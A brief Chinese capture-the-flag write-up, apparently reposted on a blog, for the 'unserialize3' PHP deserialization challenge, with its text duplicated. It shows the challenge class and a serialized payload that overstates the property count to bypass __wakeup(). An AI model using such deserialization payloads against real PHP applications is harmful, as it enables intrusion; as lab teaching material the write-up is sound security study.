高手进阶区,unserialize3
题目来源:攻防世界
题目直接给出源码:
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=
绕过__wakeup()魔术方法:当成员属性数目大于实际数目时可绕过
构造payload:
O:4:"xctf":4:{s:4:"flag";s:3:"111";}
高手进阶区,unserialize3
题目来源:攻防世界
题目直接给出源码:
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=
绕过__wakeup()魔术方法:当成员属性数目大于实际数目时可绕过
构造payload:
O:4:"xctf":4:{s:4:"flag";s:3:"111";}
本文标题:攻防世界-unserialize3
本文链接:https://www.haomeiwen.com/subject/pkkdektx.html
网友评论